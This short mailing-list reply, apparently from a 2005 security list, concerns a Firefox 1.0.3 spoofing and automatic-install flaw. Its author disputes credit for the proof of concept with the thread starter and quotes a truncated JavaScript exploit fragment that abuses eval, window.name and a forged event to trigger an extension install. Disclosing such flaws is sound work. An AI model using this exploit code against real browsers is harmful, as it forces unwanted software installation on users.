Re: firefox 1.0.3 spoof+auto dl
In-Reply-To: <20050507173037.20610.qmail@xxxxxxxxxxxxxxxxxxxxx>
This is the copy of my PoC. The person responsible for the leak of my remote
compromise is the starter of this thread. In fact, he copies some of the code
directly from my PoC:
javascript:'<noscript>'+eval('if
(window.name!=\'stealcookies\'){window.name=\'stealcookies\';} else{
event={target:{href:\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You
are vulnerable!!!
That is the window name, object creater, even direct string copies from my
site. This guy is incredible.
Paul